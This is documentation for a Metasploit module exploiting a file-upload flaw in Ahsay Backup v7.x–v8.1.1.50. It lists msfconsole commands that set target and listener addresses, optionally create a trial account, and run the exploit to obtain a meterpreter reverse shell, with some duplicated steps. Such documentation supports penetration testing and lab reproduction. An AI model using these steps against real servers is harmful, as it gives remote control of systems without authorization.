Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/misc/ahsay_backup_fileupload.md
Views: 11788
Vulnerable Application
Ahsay Backup v7.x - v8.1.1.50 Download the vulnerable version: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
Start the application ( I start it manually from C:\Program Files\AhsayCBS\bin\startup.bat
)
Verification Steps
Start
msfconsole
use exploit/windows/misc/ahsay_fileupload
enable create trial account
set CREATEACCOUNT true
set RHOST
set RHOST 172.16.238.175
set LHOST
set LHOST 172.16.238.235
run exploit
run
We should receive a meterpreter shell.
Options
CREATEACCOUNT - Create a Trial account, use this when trial accounts is enabled and you do not have a valid credentials. PASSWORD - Password to Ahsay useraccount, if CREATEACCOUNT is set this password will be used. RHOST - Target address. RPORT - The target port (TCP). TARGETURI - Path to Ahsay installation UPLOADPATH - Path to where the file should be uploaded USERNAME - Username to Ahsay account, if CREATEACCOUNT is set this username will be used.